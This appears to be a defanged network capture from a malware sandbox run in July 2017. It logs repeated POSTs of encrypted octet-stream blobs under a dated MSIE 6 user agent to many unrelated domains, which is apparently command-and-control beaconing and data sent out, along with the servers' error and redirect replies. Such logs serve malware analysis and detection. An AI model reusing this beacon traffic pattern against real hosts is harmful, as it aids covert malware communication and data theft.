106e..<!DOCTYPE HTML>.<html lang="en-US">.<head>.  &
lt;meta charset="UTF-8" />. <meta http-equiv="Content-Type" con
tent="text/html; charset=UTF-8" />. <meta http-equiv="X-UA-Comp
atible" content="IE=Edge,chrome=1" />. <meta name="robots" cont
ent="noindex, nofollow" />. <meta name="viewport" content="widt
h=device-width, initial-scale=1, maximum-scale=1" />. <title>
;Just a moment...</title>. <style type="text/css">. ht
ml, body {width: 100%; height: 100%; margin: 0; padding: 0;}. body
{background-color: #ffffff; font-family: Helvetica, Arial, sans-serif;
font-size: 100%;}. h1 {font-size: 1.5em; color: #404040; text-alig
n: center;}. p {font-size: 1em; color: #404040; text-align: center;
margin: 10px 0 0 0;}. #spinner {margin: 0 auto 30px auto; display:
block;}. .attribution {margin-top: 20px;}. @-webkit-keyframes b
ubbles { 33%: { -webkit-transform: translateY(10px); transform: transl
ateY(10px); } 66% { -webkit-transform: translateY(-10px); transform: t
ranslateY(-10px); } 100% { -webkit-transform: translateY(0); transform
: translateY(0); } }. @keyframes bubbles { 33%: { -webkit-transform
: translateY(10px); transform: translateY(10px); } 66% { -webkit-trans
form: translateY(-10px); transform: translateY(-10px); } 100% { -webki
t-transform: translateY(0); transform: translateY(0); } }. .bubbles
{ background-color: #404040; width:15px; height: 15px; margin:2px; bo
rder-radius:100%; -webkit-animation:bubbles 0.6s 0.07s infinite ea

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 536
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mojacar-vacaciones.com
Connection: Keep-Alive
Cache-Control: no-cache

oQa670tz6mf ONoWorCZL7Q77ReRlyWbr lANihXKUolIHnWvMBzyCwn fhO1Cxp9COR1bLPf/e/NPR81wwCH3ImcbHHedV7AkASEfPCowQjtaVKAEslioR1hkoT1TCkq3DUQVxTol0zhubLZqf1P6PyOIAiQQ0gwOn4UGEMZx17jNr MFJaKZK3XSflzCFKVg2G8g/na4t4eu03XVawrUtNvFYWTYN5vhdKzuv4JkCOqVlUNX3bIl734d0JeW9bO6mRAaWDPtKoqzvu3ZznFMOHMicUW84kcN5rafV9Ex98Rd7UAzo5sOPXKNeeryD3N vwiMzzkoVr8G3S5yxGTpPJ9VZkPoTB1no/3gWxT9w7rtuK45dv8WRR30ih/v9VEjoNQrV2z/1U/tcOegHl3MndNdA HB4XLpqkCyp0B/kGu3GnFlwsAnf XDz JFk5sV5H pxHA9XnDKPb7ktV7SJsHqMWcyDaimNJK2FHE7UmBzntM6gOJN0GTC5l4hzlOTFDC3ZarjpbAtPMw0cyCfL8
HTTP/1.1 403 Forbidden
Server: nginx
Date: Sat, 01 Jul 2017 11:16:49 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
<html>..<head><title>403 Forbidden</title><
/head>..<body bgcolor="white">..<center><h1>403 F
orbidden</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disa
ble MSIE and Chrome friendly error page -->..<!-- a padding to d
isable MSIE and Chrome friendly error page -->..<!-- a padding t
o disable MSIE and Chrome friendly error page -->..<!-- a paddin
g to disable MSIE and Chrome friendly error page -->..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..HTTP/1.1 4
03 Forbidden..Server: nginx..Date: Sat, 01 Jul 2017 11:16:49 GMT..Cont
ent-Type: text/html..Content-Length: 564..Connection: keep-alive..<
html>..<head><title>403 Forbidden</title></hea
d>..<body bgcolor="white">..<center><h1>403 Forbi
dden</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..<!-- a padding to disable MSI
E and Chrome friendly error page -->..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disab
le MSIE and Chrome friendly error page -->..<!-- a padding to di
sable MSIE and Chrome friendly error page -->..<!-- a padding to
disable MSIE and Chrome friendly error page -->..<!-- a padding
to disable MSIE and Chrome friendly error page -->....

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 472
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: kafrit.com
Connection: Keep-Alive
Cache-Control: no-cache

WbF3eqFjEV/JbV2CACi8uHrI0IufVblMZazS9FFfJ80RAmtIyl/wakMflf TB/VrxHn34fbST0Fwoujqsw4FAytiyAosE /QMiUV8QxA0/WEgyZdtKPUszyYFac63q29h8cAjqIX4aA3M5kMuIMANrcldGZMXVbyDolZ5K0bkR/ItwtCukXFes65Mt1VQ4Ku4cPv k WdYkChHTol0quhqM8G7m4MfhGJFsbo4KzA1tudHBGqQmwzIaMYxkk6pGTKy7sN2jHcHrmRAxf15C27pH9k0zJV4BRzfQwhhYodceK7B/yrntWUpy5j5TeKpQCWybbxH/CK38YA2R7EINTOlSxfW9ZkHQm5bgHhh7t1hX4ZXqWxl1O6RU Jd7d0u4oPRafLag8936yr/7yxx0wLp1Bs0ooNpZ gQEBd7L2Q W9KjnYejJ7MoEKluRraRCqXaxQnrNZLuR44ex4o7Wxgg==
HTTP/1.1 301 Moved Permanently
Cache-Control: private
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Location: hXXp://VVV.kafrit.com/
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 01 Jul 2017 11:21:07 GMT
8b..<html><head><title>Object moved</title><
;/head><body>..<h2>Object moved to <a href="hXXp://w
ww.kafrit.com/">here</a>.</h2>..</body></html&
gt;..HTTP/1.1 301 Moved Permanently..Cache-Control: private..Transfer-
Encoding: chunked..Content-Type: text/html; charset=utf-8..Location: h
ttp://VVV.kafrit.com/..Server: Microsoft-IIS/7.5..X-AspNetMvc-Version:
3.0..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Sat, 0
1 Jul 2017 11:21:07 GMT..8b..<html><head><title>Obje
ct moved</title></head><body>..<h2>Object move
d to <a href="hXXp://VVV.kafrit.com/">here</a>.</h2>
..</body></html>..0..0..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 468
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: doctsf.com
Connection: Keep-Alive
Cache-Control: no-cache

PMpLVk6DwGBJ9Ea62bIkrbHdphBOBzhqYrBd/Fao8YvtB5d rxte wBSXmNNu9F8dcAUmeomSuqhBxJZkJ9Ms03Pj6H7Gsd3TZ kB0jpQBaJt7RmgceHz4F/GRZOG0QikrsD1Gc2yNa5akIEbhc8IOmwrrZ5bSFvmh27vZHUh98s44eves3SALWHF0t7h1qD6SsbUIfUpdOZYJD1C4INc/GFFtHCOEJw5UamXd6G3nSNDyBCeFz6a7ctBYkYojYBftXvuItUNEndeZoRu2kWvucq0LvdKQ7dY9AUtXUgIGOkNx1Fo7be0BgYyrpX63rUCrzyN5uztxcis2RH/94 II7HGjXPd5mD dzYdYvdWm5 ILIC7C/vJcg3a0x3TPvihGbHKZLgd3IHdAld5ROpe9rZxlyaxvpJoCS68p8ZH52ro/YsrfL5nr96unEk0IVjAt70Gkdl9ZJLbtKEPA==
HTTP/1.1 302 Moved Temporarily
Set-Cookie: rd=R3047009581; path=/; expires=Mon, 03-Jul-2017 23:28:14 GMT
Server: nginx
Date: Sat, 01 Jul 2017 11:16:41 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: hXXp://VVV.doctsf.com
<html>..<head><title>302 Found</title></hea
d>..<body bgcolor="white">..<center><h1>302 Found
</h1></center>..<hr><center>nginx</center&g
t;..</body>..</html>....


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 512
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: agence-des-druides.com
Connection: Keep-Alive
Cache-Control: no-cache

IrF 8Bzd12EcOXLgR1U6zq8yZ1Q0qA9kEHD9XAgoC91/PIQKPG8sLpCMq255ZljTHHJrPCFXxMeyBSczU/LccIi6W9xGkrFeSnZ0 D8LcBzs40r2C4mDNngQ5EUD04ju6Yu0iRM8xzfqUeU4y71PDIBisWE4uyWWOImvwfLmHXp iHg7yerAQIcofMXr9lyU8iaE5vTGK7/204FaNDVJoke/uVZf7s06wxEVPw/GmLuT8cWRE6YbR2bJImXUApxITXJfHrXNISrj7Gj4EWqaAj8dWNN/hJ4B CJ8kHJ557aGN7QztWCrfxaGMlFjXEXUl88sk1vrSVLJjQtmxuGdCGP2EV5jEIHiA0AEGPRD uIFN5oCuwzIry jPkf3eYmE4RjnAZDLJZezV46dJ6wiCUwHJtWje84jsEKWKisCikJaegNq2J368fHjAGqk8J8hOQPW2xPG3zkSApHRTZ2ptRfTVvSkSDHOi8ss99v3zESJgPBR59v9ZAP4agnohMA=
HTTP/1.1 200 OK
Set-Cookie: mailplanBAK=R2555564460; path=/; expires=Sat, 01-Jul-2017 12:16:44 GMT
Date: Sat, 01 Jul 2017 11:16:42 GMT
Content-Type: text/html
Content-Length: 7563
Set-Cookie: mailplan=R3858542430; path=/; expires=Sat, 01-Jul-2017 12:29:17 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
X-IPLB-Instance: 867
<?xml version="1.0"?>.<!DOCTYPE html PUBLIC "-//W3C//DTD HTML
4.01//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<
;html xmlns="hXXp://VVV.w3.org/1999/xhtml">.<head>.<meta h
ttp-equiv="Content-Type" content="text/html; charset=utf-8" />.<
title qtlid="187136">En construction</title>.<meta http-eq
uiv="Content-Language" content="fr" />.<meta http-equiv="descrip
tion" name="description" content="site en construction" />.<meta
http-equiv="identifier-url" name="Identifier-URL" content="" />.&l
t;meta http-equiv="revisit-after" name="Revisit-after" content="2 days
" />.<meta http-equiv="robots" name="Robots" content="all" />
.<meta name="robots" content="INDEX|FOLLOW" />.<meta http-equ
iv="cache-control" content="no-cache" />.<meta http-equiv="pragm
a" content="no-cache" />.<link rel="icon" href="/favicon.ico" ty
pe="image/gif" translate="none" />.<style type="text/css" transl
ate="none"> ..body{...font-family:"Trebuchet MS","DejaVuSans";...fo
nt-size:11px;..}..ol, ul, li {...font-size:11px;...color:#4c4c4c;..}..
#global{...width:792px;...margin:auto;. }. img{ border:0px; }. #hea
der{. width:792px;. margin:auto;. border:0;..}..#container{ w
idth:792px; }..#main{...width:792px;...height:40px;...background:url('
img/main_full_top.jpg');..}..#landing{...width:790px;...height:370px;.
..background:url('img/landingpage.jpg');..}..#content{...width:790px;.
.}...columns{...width:375px;...padding:5px;..}..#footer{...width:7

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 428
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: xing-group.com
Connection: Keep-Alive
Cache-Control: no-cache

/8TiI2M/cHaGicAr6p0OKoyX2ZCJ0dbjRyuKerz3i7PBa8WhZWxJyeWhbW15m1/Ib6x0jt0mv/7K3NgEdjupfAScw9NF6bk0oNWt5BYMww3X gUOX9rFNQBAiu2Gyd/3gEgohFvYtTv1ecpJyP6eAwWrpR uLQ0mJa6QMP5c8kaBh2/oNhodnXUXDDMK7BWstV/fa8vGdWbqDzb4Dvt2QrOPlGSaAxyZFXgY6zKNFf76wNtjEs7iXxOYAgLnmEYSRHomR0STeIcHJBuTBMMBTdpNbc GRHOMfkW3F5y1lV5Y6eI FhJWnlNN/Ya/uJOs2UOeSJ9mmUf49OnN/Hx 0 jXKzqyib9ZFrAAfdqQuBcqTUCtt4Z LfUwmRZZ7LTBeNdBqDH/vRUVcdu1681oaJ2qvuA0zNBH69LtxYeDLg==
HTTP/1.1 405 Method Not Allowed
Date: Sat, 01 Jul 2017 11:17:07 GMT
Server: Apache
Allow: 
Content-Length: 222
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>405 Method Not Allowed</title>.</hea
d><body>.<h1>Method Not Allowed</h1>.<p>The
requested method POST is not allowed for the URL /.</p>.</bo
dy></html>...


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.kagu-hokuren.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:16:54 GMT
Server: Apache
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>403 Forbidden</title>.</head><
body>.<h1>Forbidden</h1>.<p>You don't have permis
sion to access /.on this server.</p>.<p>Additionally, a 50
0 Internal Server Error.error was encountered while trying to use an E
rrorDocument to handle the request.</p>.</body></html&g
t;...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 444
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dbcomponents.com
Connection: Keep-Alive
Cache-Control: no-cache

KVTFoE1dbF7 CNxpxF6hUQZvOeK7LnlA0QLvvFLz9qko8qxOo9Lg3HJdR80pNsSBmKQjaiIbWc6GMfSQzLj/cQ8A6N3RPV7Xt0VwwULNgVAaZt9WaVWQdMQelui3BRtLipl8OFPrcFKwIHcyo3YnkaGKTS7FAj/gLaBiu62w0BR s T5wBbjQ96R1MZ/JZeIuR472 sObrfX/OViXuq4ya MKClgPzhjPUBWPLPVw/R0GuMxYxpuACZ7xKC8Wtcn99Q3sjIxo0bF5 B7m7ws31RQI7iUw0HD4 C8voT9QxDkBedFEkyrMdJGOrDaUDbERR5n6eqEYxvgab31yTxeiq36q/uJsT3NnU5BF81Z047 a9E4f7SIJDGAZl6XOpwaRXTqSmrOFji2zi8pKh0PUoCMUk3f0vf/XQM8qBjG OYVdr5G2PZ40ODQDQ==
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 01 Jul 2017 11:16:38 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXp://VVV.dbcomponents.com/
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx</center>..</body>..</html>..HTTP/1.1 301
Moved Permanently..Server: nginx..Date: Sat, 01 Jul 2017 11:16:38 GMT
..Content-Type: text/html..Content-Length: 178..Connection: keep-alive
..Location: hXXp://VVV.dbcomponents.com/..<html>..<head>&l
t;title>301 Moved Permanently</title></head>..<body
bgcolor="white">..<center><h1>301 Moved Permanently<
/h1></center>..<hr><center>nginx</center>..
</body>..</html>..
....



POST / HTTP/1.1

Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 496
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dbcomponents.com
Connection: Keep-Alive
Cache-Control: no-cache

BND1X3ZR5nGnmCzr0RocvhlacqmWlK4AClW0qO8TOJRGrEAAKhOokf3zrwmaPmM171o/J9QhW9hNjTUzjkXoRyclSJVFsWRhWcTaXMuRj2W9Z 2i8hxfO4NxErEMTWD/NRTgM69hlxNIV0kvoZqW7uDgQhx fs1XaIjhiuIlGkg339wqhNTAjtdKUH1PG1o0G2Ie9U68/LDY0Usji7IbkfM9e9VBaHOa0SI5Tw8eGoo1EqnhOngcL5nJn4tuMJZ9dhfCtKGOCjbWCiZqgj8yft0jutmQopShmOxUy6PGuDV/2L1Py1nsOPW788X1TxA1IZs1PUQKtrOQSHwUMOAVtSxqLIfPHarIl/cNUHEknljSpIKqeQJDVqnuEBGF6rosVUfkQVmttT3Rez/14b7/gJm5M8pMae6YvPDfChukx cbGispy77i2/ 5wRBfzB YwX6AFdL7Mk0JIcbnlLw7 zYdDkql1DAfSfNXZl4b 6P3yuM=
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 01 Jul 2017 11:17:01 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXp://VVV.dbcomponents.com/
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx</center>..</body>..</html>..HTTP/1.1 301
Moved Permanently..Server: nginx..Date: Sat, 01 Jul 2017 11:17:01 GMT
..Content-Type: text/html..Content-Length: 178..Connection: keep-alive
..Location: hXXp://VVV.dbcomponents.com/..<html>..<head>&l
t;title>301 Moved Permanently</title></head>..<body
bgcolor="white">..<center><h1>301 Moved Permanently<
/h1></center>..<hr><center>nginx</center>..
</body>..</html>....


GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRvdluGAc/lYx1bXFBnllP1ugYHmAQUwk9IV/zRT5rAXTh9DgXb2S61UmACEBcIefF38d2vUUuu7Wj4bZs= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: tj.symcd.com


HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: application/ocsp-response
Content-Length: 1413
content-transfer-encoding: binary
Cache-Control: max-age=318350, public, no-transform, must-revalidate
Last-Modified: Wed, 28 Jun 2017 03:42:50 GMT
Expires: Wed, 5 Jul 2017 03:42:50 GMT
Date: Sat, 01 Jul 2017 11:17:00 GMT
Connection: keep-alive
0.........z0..v.. .....0.....g0..c0................p,:...Y.Q ..2017062
8034250Z0s0q0I0... ........ov[....c.[\Pg.S........OHW..O..]8}......R`.
...y.w...QK..h.m.....20170628034250Z....20170705034250Z0...*.H........
.......!j..u...m"....}..}...-cO6..Z.:...-h..I8.........L1l........2h{g
.5=hc....%..7m..|...X,e....E.D......58..._.....vu...;.........n,......
Pt.,..3..<..8Q.......W?..=...AX9:........Q.|G.B.C.h.........$ _.y-.
......./O...D....Lu.#F.RW..c..v....<sF.i.......3..........0...0...0
............ e...7.......60...*.H........0A1.0...U....US1.0...U....tha
wte, Inc.1.0...U....thawte SSL CA - G20...170426000000Z..170725235959Z
0,1*0(..U...!thawte SSL CA - G2 OCSP Responder0.."0...*.H.............
0.........w........3..c.....Es..\>..b....z...J..T..y..&E%..;[.)....
.7{o.!X.`...p._....:.H{{u...... 9...ast...T..X...G.....|........?EpZ..
.....UCU.}.:K7...o..R.*../..0F..e.Q.)BVfj"....../)....E.......z.......
El........OQi.Y..........f.. ..\.._.1W#...&..u........P.H.........0..0
... .....0......0!..U....0...0.1.0...U....TGV-E-9820...U.#..0....OHW..
O..]8}......R`0...U................p,:...Y.Q 0...U.......0.0...U.%..0.
.. .......0...U...........0...*.H.............O.~....WWd.......s.Q~g..
...s..qy.......v...K...E..........B.5..R..l.u.t..'V......6..k..<'.&
.v.p...DCxrQYa.[U.........O......^...;]mY.;.}....:-....Q..q...%<.W2
=:.E]...P.....Z....w%..$M.f...v.......%.4....:..o.e..Y....g...........
1q..cs...X.-..5....M6y....&...

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: juizi.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Sat, 01 Jul 2017 11:17:01 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 19325
Connection: keep-alive
Content-Language: en
Expires: Sat, 1 Jan 2000 00:00:00 GMT
X-Cache-Rule: plone.content.itemView
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
X-Varnish: 2121982735
Age: 0
Via: 1.1 varnish
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmln
s="hXXp://VVV.w3.org/1999/xhtml">.<head>.<base href="http:
//juizi.com/homepage/" />..<meta http-equiv="Content-Type" conte
nt="text/html; charset=utf-8" />.<title>Juizi - Unique websit
es: designed, developed & hosted by us</title><meta http-
equiv="Content-Type" content="text/html; charset=utf-8" /><meta
http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="DC.
creator" content="Karel" /><meta name="DC.format" content="text/
html" /><meta name="DC.language" content="en" /><meta name
="DC.date.modified" content="2015-09-16T14:43:41 02:00" /><meta
name="DC.date.created" content="2015-09-04T13:36:14 02:00" /><me
ta name="DC.type" content="Page" /><meta name="DC.distribution"
content="Global" /><meta name="description" content="Professiona
l website design, website development, content management and hosting,
as well as an array of support services." /><meta name="robots"
content="ALL" /><meta name="distribution" content="Global" />
;<meta name="viewport" content="width=device-width; initial-scale=0
.6666; maximum-scale=1.0; minimum-scale=0.6666" /><meta name="ge
nerator" content="Plone - hXXp://plone.org" />.<link href="https
://fonts.googleapis.com/css?family=Roboto:400,300,100,500" rel="styles
heet" type="text/css" />.<link rel="stylesheet" type="text/c

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 492
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: krafthaus.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __cfduid=db5b961e430a0bc52919d2a9a8a40c59b1498907836

pBNW0nh6u5B08M8V /t3PmsgV8XAhutVLF1j65XpUlj1WNfvNwkSPU8lkz66VkA5x74AhVuAEAp1/K4i1eovPq /P9HS3nHU/JV9hb1HWWP nkkKJFC39v0kidHeDlTHkrApphonRkeLWGXHbB6WnkvvQkREcT0JoGojGY7QJLEH02xM7WfQqhF46LpKfuVqsc1Rc3shzYYnRK6FmGM/ZjSh8OPqOb7gityQsnnA3uT1gwk2ZO0XCmk3EWj2C3po1I9CLim0RvtivXHFoIs1q85vBXcqQueHauRmwjnZ2irthAMdgyFyGm/R7Z1VJP5ZXmRfcLrrUrmsbzpcZqs1SKXGQpTjNsQZeL0FPvhHyFxKzFHvVGwa7UZr5B PXWgAP7ReOSloD9 5r0koTu6y XyGQKQi07E3vtbDlV7Ip1eVHOJOiinTI9BJapggP  BgvHzKKwAfTYHFxZZuUVUzHXy9k0HYTRKoEx8Q/OeVto=
HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 01 Jul 2017 11:17:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache
Server: cloudflare-nginx
CF-RAY: 3778f5bda0bc83dc-KBP
1020..<!DOCTYPE HTML>.<html lang="en-US">.<head>.  &
lt;meta charset="UTF-8" />. <meta http-equiv="Content-Type" con
tent="text/html; charset=UTF-8" />. <meta http-equiv="X-UA-Comp
atible" content="IE=Edge,chrome=1" />. <meta name="robots" cont
ent="noindex, nofollow" />. <meta name="viewport" content="widt
h=device-width, initial-scale=1, maximum-scale=1" />. <title>
;Just a moment...</title>. <style type="text/css">. ht
ml, body {width: 100%; height: 100%; margin: 0; padding: 0;}. body
{background-color: #ffffff; font-family: Helvetica, Arial, sans-serif;
font-size: 100%;}. h1 {font-size: 1.5em; color: #404040; text-alig
n: center;}. p {font-size: 1em; color: #404040; text-align: center;
margin: 10px 0 0 0;}. #spinner {margin: 0 auto 30px auto; display:
block;}. .attribution {margin-top: 20px;}. @-webkit-keyframes b
ubbles { 33%: { -webkit-transform: translateY(10px); transform: transl
ateY(10px); } 66% { -webkit-transform: translateY(-10px); transform: t
ranslateY(-10px); } 100% { -webkit-transform: translateY(0); transform
: translateY(0); } }. @keyframes bubbles { 33%: { -webkit-transform
: translateY(10px); transform: translateY(10px); } 66% { -webkit-trans
form: translateY(-10px); transform: translateY(-10px); } 100% { -webki
t-transform: translateY(0); transform: translateY(0); } }. .bubbles
{ background-color: #404040; width:15px; height: 15px; margin:2px; bo
rder-radius:100%; -webkit-animation:bubbles 0.6s 0.07s infinite ea

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 500
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: screaminpeach.com
Connection: Keep-Alive
Cache-Control: no-cache

UjDDzh/uA4aIeuOHfmSJ3Kh9Qwn1rDoRw4 4woKm/UHS4LZA563M3xp7Wnlrs9jdRrTmrN/2aYdU5DvSl1JzfFFpXrdemd2R3rMhsgvWZv4orrieuJkZYH/Xppx352LHuUXAM8cUkJIB h0JNDPodsL9AfAls0ZR7LVjJpPCGLPlqiTAvJXw/jR9zp2Gpb2ha7qn/T/mwJSHn3xR2NIm81W0xQyBzBAzIBVA35JPNnj3gF5/xeUtLmlccLoXoi7sJuTdzle71e4IjzkNmZp8O4zep2oAwUHdQDPHQgYejGc1irzos5tz4gQfVz3wjsfYr370qs5h0E 7IIdmT7T12wH94fGNlNKdZy9RXf1v01GvleABz7CCLkCwukNw1TtiJ5frq6j/xtg3vf8WBHgdndNsCYTh8xksDJ0YzYFox2TG8NDKKQcCaRobdkJK1pNWWFghWsWmXgUyy/HvTEZeW2neA1MWf4fNWznF2zAGM/QMGL2D5WdW
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:17:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __cfduid=dc106140ccf8bdfa48743152264286a481498907845; expires=Sun, 01-Jul-18 11:17:25 GMT; path=/; domain=.screaminpeach.com; HttpOnly
Cache-Control: max-age=2
Expires: Sat, 01 Jul 2017 11:17:27 GMT
X-Frame-Options: SAMEORIGIN
Server: cloudflare-nginx
CF-RAY: 3778f56f71d4820d-KBP
159d..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no
-js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
; <html class="no-js ie7 oldie" lang="en-US"> <![endif]--&
gt;.<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-
US"> <![endif]-->.<!--[if gt IE 8]><!--> <html
class="no-js" lang="en-US"> <!--<![endif]-->.<head>
.<title>Attention Required! | Cloudflare</title>..<meta
charset="UTF-8" />.<meta http-equiv="Content-Type" content="tex
t/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" con
tent="IE=Edge,chrome=1" />.<meta name="robots" content="noindex,
nofollow" />.<meta name="viewport" content="width=device-width,
initial-scale=1,maximum-scale=1" />.<link rel="stylesheet" id="c
f_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" med
ia="screen,projection" />.<!--[if lt IE 9]><link rel="styl
esheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css"
type="text/css" media="screen,projection" /><![endif]-->.<
style type="text/css">body{margin:0;padding:0}</style>.<!-
-[if lte IE 9]><script type="text/javascript" src="/cdn-cgi/scri
pts/jquery.min.js"></script><![endif]-->.<!--[if gte
IE 10]><!--><script type="text/javascript" src="/cdn-cgi/
scripts/zepto.min.js"></script><!--<![endif]-->.<
script type="text/javascript" src="/cdn-cgi/scripts/cf.common.js"&

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 476
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: espace-hotelier.com
Connection: Keep-Alive
Cache-Control: no-cache

5hCVETiFLV7k1HJRuwdLKis5ffuA2Heu7OtvBSAUVdMs xFNNrqvpjXqxuJDQ43L c2BMlZc5mrXuSRhtGTci2s7F7OZN3Wv2vZIeIAUyR BbJy63zMOuO2556sQdbKjie8gUNj3RHFHgNx6shSNRE/U8tJ/1n07RCJpWIf M0NgX0gj9fdTskwPfFtJLMZBXUldgxIyQbLyoY3Qy8AlKzlKd88gkwGfgD4wcmUsK jJwT44yUaP/zXchTyH2RpxIb5NwIhEjxkj4e8vtqVHnXuOH/GoddiSgkwBzXy9KOIUTa2fQFNfOdy5W0fCWZxxRL6Bk4Jv7Wd7yTZw3vHGbuOrsWDQbQyLRRB3sKtKo/1plGZgq BjvZgs57P5Ac tZRvBGWodrhJkBft5qReVognSrEr0e/JrPFMuU2 5ACruyLte2fHMweCTYSC/lrnrnB9bInkPqfvgjy FLvNdrqKszKJ 
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=iso-8859-1
Content-Length: 239
Connection: keep-alive
Keep-Alive: timeout=15
Date: Sat, 01 Jul 2017 11:16:38 GMT
Server: Apache
Location: hXXp://VVV.espace-hotelier.com/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://VVV.espace-hotelier.com/">here
</a>.</p>.</body></html>.HTTP/1.1 301 Moved Pe
rmanently..Content-Type: text/html; charset=iso-8859-1..Content-Length
: 239..Connection: keep-alive..Keep-Alive: timeout=15..Date: Sat, 01 J
ul 2017 11:16:38 GMT..Server: Apache..Location: hXXp://VVV.espace-hote
lier.com/..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.&l
t;html><head>.<title>301 Moved Permanently</title>
;.</head><body>.<h1>Moved Permanently</h1>.<
;p>The document has moved <a href="hXXp://VVV.espace-hotelier.co
m/">here</a>.</p>.</body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 484
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
